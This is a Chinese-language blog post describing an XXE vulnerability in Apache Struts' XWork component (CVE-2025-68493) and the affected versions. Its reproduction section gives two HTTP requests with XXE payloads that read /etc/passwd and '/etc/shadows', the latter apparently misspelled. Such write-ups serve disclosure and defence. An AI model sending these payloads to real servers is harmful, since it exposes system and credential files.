Apache Struts XWork 组件 XXE 漏洞(CVE-2025-68493)[已复现]

一、漏洞介绍

Apache Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。

Apache Struts的XWork组件在解析XML配置文件时未对输入进行充分的安全校验,攻击者可通过提交恶意XML文档,诱使服务器在解析过程中加载文件触发漏洞。成功利用漏洞的攻击者,可获取目标服务器敏感信息或导致服务器拒绝服务。

二、影响版本

2.0.0 <= Struts <= 2.3.37 (EOL)

2.5.0 <= Struts <= 2.5.33 (EOL)

6.0.0 <= Struts <= 6.1.0

三、漏洞复现

复制代码
POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1
...
Content-Length: 101
Content-Type: application/x-www-form-urlencoded

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/shadows">]>
<root>&xxe;</root>
复制代码
POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1
...
Content-Length: 101
Content-Type: application/x-www-form-urlencoded

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
相关推荐
见青..16 天前
文件上传漏洞之原理、探测、利用、绕过、防御
web安全·网络安全·漏洞·文件上传
网络研究院17 天前
网络研究观-严重漏洞允许以 root 用户身份执行任意命令:CVE-2026-0273 分析
网络·安全·漏洞·修复·设备
阿昭L19 天前
Windows堆dword shoot
windows·安全·漏洞·堆溢出
南山丶无梅落21 天前
文件上传漏洞2
漏洞·文件上传·网安·条件竞争·二次渲染·0x00截断·图片马
大山是只猫1 个月前
struts 从struts 2版本 升级6.8.0 版本
java·struts2·struts6
菩提小狗1 个月前
每日安全情报报告 · 2026-06-04
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗1 个月前
每日安全情报报告 · 2026-06-03
网络安全·漏洞·cve·安全情报·每日安全
南山丶无梅落1 个月前
XXE漏洞
xml·漏洞·xxe·网安
菩提小狗1 个月前
每日安全情报报告 · 2026-06-02
网络安全·漏洞·cve·安全情报·每日安全
网络研究院1 个月前
即将过期的安全启动证书将如何影响 Windows 设备
安全·微软·系统·漏洞·硬件